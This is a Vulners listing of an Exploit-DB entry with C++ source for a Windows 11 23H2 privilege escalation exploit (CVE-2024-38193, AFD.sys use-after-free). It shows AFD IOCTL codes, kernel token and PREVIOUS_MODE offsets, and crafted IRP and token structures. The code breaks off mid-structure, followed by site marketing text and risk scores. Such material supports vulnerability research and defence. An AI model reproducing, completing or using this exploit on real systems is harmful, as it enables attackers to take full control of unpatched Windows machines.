Vulners
Lucene search
📄 Microsoft Windows 11 Pro 23H2 Privilege Escalation
| Reporter | Title | Published | Views | Family All 69 |
|---|---|---|---|---|
 | Exploit for Use After Free in Microsoft | 3 Dec 202408:56 | – | githubexploit |
 | CVE-2024-38193 | 13 Aug 202400:00 | – | attackerkb |
 | CVE-2024-38193 | 13 Aug 202418:05 | – | circl |
 | CISA Adds Six Known Exploited Vulnerabilities to Catalog | 13 Aug 202412:00 | – | ics |
 | Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability | 13 Aug 202400:00 | – | cisa_kev |
 | CISA Adds Six Known Exploited Vulnerabilities to Catalog | 13 Aug 202412:00 | – | cisa |
 | Microsoft Windows Ancillary Function Driver for WinSock 资源管理错误漏洞 | 13 Aug 202400:00 | – | cnnvd |
 | CVE-2024-38193 | 13 Aug 202417:29 | – | cve |
 | CVE-2024-38193 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | 13 Aug 202417:29 | – | cvelist |
 | Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation | 9 May 202500:00 | – | exploitdb |
10
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver
for WinSock Elevation of Privilege
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof)
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
struct _TOKEN Body; //0x30
};
struct mm {
void* fake_data_entry;
void* input;
_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 May 2025 00:00Current
9.2High risk
Vulners AI Score9.2
CVSS 3.17.8
EPSS0.73233
SSVC